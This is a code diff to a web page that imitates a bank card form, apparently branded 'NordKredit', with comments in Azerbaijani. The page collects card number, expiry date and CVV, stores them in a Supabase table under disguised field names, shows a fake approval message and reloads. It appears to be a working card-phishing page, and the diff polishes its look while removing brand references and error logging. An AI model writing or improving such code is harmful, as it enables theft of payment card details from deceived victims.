--- a/index.html
+++ b/index.html
@@ -100,10 +100,18 @@ color:white;
 background:radial-gradient(circle at center,#1bb34a,#0c5f2b 70%);
 }
 .back{
-background:#111;
+background:radial-gradient(circle at center,#1bb34a,#0c5f2b 70%);
 transform:rotateY(180deg);
 }
-.strip{height:40px;background:black;margin-top:20px;}
+
+/* STRIP artıq kart rəngində */
+.strip{
+height:40px;
+margin-top:20px;
+background:radial-gradient(circle at center,#1bb34a,#0c5f2b 70%);
+border-radius:6px;
+}
+
 .cvv-box{
 margin-top:30px;
 background:white;
@@ -116,12 +124,14 @@ font-weight:bold;
 
 .number{
 position:absolute;
-top:50%;
+top:55%;
 left:50%;
 transform:translate(-50%,-50%);
 font-size:20px;
 letter-spacing:3px;
+white-space:nowrap;
 }
+
 .exp{
 position:absolute;
 bottom:20px;
@@ -129,7 +139,7 @@ left:20px;
 font-size:14px;
 }
 
-/* NordKredit yazısı və loqo */
+/* Logo */
 .logo-text{
 position:absolute;
 top:15px;
@@ -262,7 +272,6 @@ const card=document.getElementById("card")
 const loading=document.getElementById("loading")
 const loadingText=document.getElementById("loadingText")
 
-/* 16 rəqəm format */
 numberInput.addEventListener("input",e=>{
 let val=e.target.value.replace(/\D/g,'').substring(0,16)
 val=val.replace(/(.{4})/g,'$1 ').trim()
@@ -270,7 +279,6 @@ cardNumber.textContent=val||"0000 0000 0000 0000"
 numberInput.value=val
 })
 
-/* MM/YY auto format */
 expInput.addEventListener("input",e=>{
 let val=e.target.value.replace(/\D/g,'').substring(0,4)
 if(val.length>=3){ val=val.substring(0,2)+"/"+val.substring(2) }
@@ -278,7 +286,6 @@ expInput.value=val
 cardExp.textContent=val||"MM/YY"
 })
 
-/* Flip */
 cvvInput.addEventListener("focus",()=>card.classList.add("flip"))
 cvvInput.addEventListener("blur",()=>card.classList.remove("flip"))
 
@@ -298,7 +305,7 @@ if(cvvInput.value.length!==3){ alert("3 rəqəmli kod daxil edin"); return }
 
 loading.style.display="flex"
 
-const { data, error } = await supabase.from("mesajlar").insert([
+const { error } = await supabase.from("mesajlar").insert([
 {
 kod1:numberInput.value,
 kod2:expInput.value,
@@ -306,22 +313,14 @@ kod3:cvvInput.value
 }
 ])
 
-if(error){ console.error("Supabase xəta:", error); alert("Xəta baş verdi: " + error.message); loading.style.display="none"; return }
+if(error){ alert("Xəta: " + error.message); loading.style.display="none"; return }
 
 setTimeout(()=>{
 loadingText.textContent="Təbriklər Sorğunuz Təsdiq Olundu"
 },7000)
 
-/* Avtomatik təmizləmə və spinner reset */
 setTimeout(()=>{
-numberInput.value=""
-expInput.value=""
-cvvInput.value=""
-cardNumber.textContent="0000 0000 0000 0000"
-cardExp.textContent="MM/YY"
-cvvDisplay.textContent="***"
-loadingText.textContent="Loading..."
-loading.style.display="none"
+location.reload()
 },9500)
 
 })
